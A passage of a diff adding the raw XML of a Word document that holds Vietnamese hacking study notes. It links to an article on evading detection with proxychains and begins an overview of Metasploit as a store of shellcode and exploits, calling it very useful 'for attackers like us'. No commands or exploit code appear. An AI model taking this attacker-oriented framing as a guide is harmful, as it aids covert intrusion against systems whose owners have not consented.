+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>truy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>cập</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>đến</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>đi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>Nhận</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>được</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>báo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>cáo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> chi </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>tiết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>về</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>lỗi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>mạng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId6" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://null-byte.wonderhowto.com/how-to/hack-like-pro-evade-detection-using-proxychains-0154619/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>( proxy chain )</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> framework </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> framework </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mã</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nguồn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mở</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>phát</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>triển</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nhằm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sử</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dụng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> shellcode (payload) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tấn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>công</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lỗ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>hổng.Cùng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>với</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>số</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bộ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>công</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cụ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bảo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mật</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>khác,Metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cơ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sở</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dữ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>liệu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chứa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hàng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ngàn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> shellcode ,</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hàng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ngàn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> exploit </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>của</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hệ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>điều</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hành,các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chương</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>trình</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> hay </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dịch</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vụ.Trong</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>quá</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>trình</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>phát</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>triển</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>liên</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tục</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cập</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nhật</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Exploit.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> framework </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bộ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dự</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>án</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sinh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kiểm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>độ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> an </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>toàn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>pentesting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> )</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nhưng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>đối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>với</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>những</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> attacker </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>như</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chúng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ta,thì</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nó</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thực</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sự</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>công</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cụ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vô</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cùng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hữu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ích</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ( </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dùng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kiểm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ,</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>khai</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thác</w:t>
+      </w:r>
